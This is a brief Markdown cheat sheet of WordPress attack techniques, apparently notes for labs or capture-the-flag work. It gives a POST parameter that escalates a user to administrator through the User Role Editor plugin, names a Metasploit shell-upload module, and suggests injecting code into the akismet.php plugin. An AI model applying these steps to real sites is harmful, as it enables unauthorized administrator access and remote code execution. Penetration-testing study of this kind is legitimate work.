23 lines
488 B
Markdown
23 lines
488 B
Markdown
# Wordpress
|
|
|
|
## ure_user_roles
|
|
|
|
* [exploitdb 44595](https://exploit-db.com/exploits/44595.)
|
|
* [windsordeveloper](https://windsorwebdeveloper.com/dc-6-vulnhub-walkthrough/)
|
|
|
|
* Update user profile and append POST parameter to gain administrator role on user
|
|
```sh
|
|
&ure_other_roles=administrator
|
|
```
|
|
|
|
## Shell Upload
|
|
|
|
* Msfconsole
|
|
```sh
|
|
exploit/unix/webapp/wp_admin_shell_upload
|
|
```
|
|
|
|
## Template & Plugin Editing
|
|
|
|
* If template injection does not work, use plugin injection on `akismet.php`
|